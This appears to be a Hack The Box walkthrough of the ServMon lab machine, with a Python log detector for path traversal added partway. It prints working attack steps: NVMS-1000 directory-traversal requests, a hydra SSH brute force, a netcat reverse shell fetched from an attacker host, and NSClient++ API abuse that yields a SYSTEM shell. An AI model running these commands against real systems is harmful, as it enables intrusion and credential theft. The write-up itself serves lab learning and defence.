Hello everyone, this is a simple Hack The Box walkthrough of the machine named ServMon, which has the IP address 10.10.10.184.

#nmap

$nmap -sV -sC -Pn 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 09:03 EDT
Nmap scan report for 10.10.10.184
Host is up (0.57s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
|
|     window.location.href = "Pages/login.htm";
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open napster?
8443/tcp open ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|     jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4m25s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
| date: 2020-06-19T13:11:04
|_ start_date: N/A

Port 21 (FTP) is open and allows anonymous login; browsing it, we found Confidential.txt in the Nadine user's folder.

Port 80 runs the default HTTP service of NVMS-1000, and after some searching we also found a directory traversal issue for it:

https://www.exploit-db.com/exploits/47774

#Request:
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.184/
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

#Response:
HTTP/1.1 200 OK
Content-type:
Content-Length: 92
Connection: close
AuthInfo:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Confidential.txt tells us that Passwords.txt is located on the Desktop in the Nathan user's folder, so we fetch it with the same traversal:

#Request:
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.184/
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

#Response:
HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo:
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
[email protected]
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
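Both requests above work only because the server maps `..` segments onto disk without normalising the path first. The following detector is an added example and not part of the original post: it runs over constructed access-log lines (mine, not real traffic) and flags every request whose path resolves above the web root, including percent-encoded and backslash variants; the function names are my own.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Jun/2020:09:05:01 -0400] "GET /Pages/login.htm HTTP/1.1" 200 340
10.0.0.5 - - [19/Jun/2020:09:05:07 -0400] "GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1" 200 92
10.0.0.5 - - [19/Jun/2020:09:05:09 -0400] "GET /..%2f..%2f..%2fUsers/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 156
10.0.0.5 - - [19/Jun/2020:09:05:11 -0400] "GET /images/..\\..\\..\\windows\\win.ini HTTP/1.1" 200 92
10.0.0.5 - - [19/Jun/2020:09:05:12 -0400] "GET /css/../Pages/login.htm HTTP/1.1" 200 340
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def escapes_webroot(raw_path: str) -> bool:
    """Return True if the request path resolves above the web root.

    The path is percent-decoded twice (catches %252e double encoding) and
    backslashes are treated as separators, since NVMS-1000 runs on Windows.
    normpath on a *relative* path keeps leading '..' segments instead of
    silently dropping them, which is exactly the escape we want to see.
    """
    path = raw_path.split("?", 1)[0]
    path = unquote(unquote(path)).replace("\\", "/")
    normalised = posixpath.normpath(path.lstrip("/"))
    return normalised == ".." or normalised.startswith("../")


def find_traversals(log_text: str) -> list:
    """Return (method, raw_path) for every request that escapes the root."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and escapes_webroot(m.group("path")):
            hits.append((m.group("method"), m.group("path")))
    return hits


if __name__ == "__main__":
    for method, path in find_traversals(SAMPLE_LOG):
        print(f"TRAVERSAL {method} {path}")
```

A request such as `/css/../Pages/login.htm` is left alone because it still resolves inside the root; only paths that climb past it are reported.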

Passwords.txt gives us a list of candidate passwords, and we already know two usernames, Nadine and Nathan. So we decided to brute force SSH: create a user file containing both usernames and a pass file containing the passwords, then run hydra. It found the password for user nadine.

$hydra -L user -P pass 10.10.10.184 ssh
[22][ssh] host: 10.10.10.184 login: nadine password: [email protected]
Login to SSH:
[email protected]:~# ssh [email protected]
[email protected]'s password:
Microsoft Windows [Version 10.0.18363.752]
© 2019 Microsoft Corporation. All rights reserved.
[email protected]RVMON C:\Users\Nadine>

#user flag

[email protected] C:\Users\Nadine>cd Desktop
[email protected] C:\Users\Nadine\Desktop>type user.txt
cf117f0d01d73a1f419b521fdf0b8dd1
[email protected] C:\Users\Nadine\Desktop>

Now check that the NSClient++ service is running, and get its web password:

[email protected] C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT

Create a .bat file named me.bat to get a reverse connection using netcat back to our local Kali machine, and place it in /var/www/html together with nc.exe.

@echo off
C:\Temp\nc.exe 10.10.X.X 4444 -e powershell

Download me.bat and nc.exe onto the box; the password ew2x6SsGTxjRwXOT obtained above is used for the NSClient++ API in the next step.

[email protected] C:>powershell.exe wget "http://10.10.X.X/nc.exe" -outfile "c:\temp\nc.exe"
[email protected] C:>powershell.exe wget "http://10.10.X.X/me.bat" -outfile "c:\temp\me.bat"

Go to a new Kali terminal and start an nc listener:

[email protected]:~# nc -lvnp 4444
listening on [any] 4444 …

#root flag

Now let's run the curl commands against the NSClient++ API:

[email protected] C:\Temp>curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/me.bat --data-binary "C:\Temp\nc.exe 10.10.X.X 4444 -e cmd.exe"
[email protected] C:\Temp>curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/me…te?time=3m

Check the nc listener for a connection:

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

Go to the Desktop and you will find root.txt.
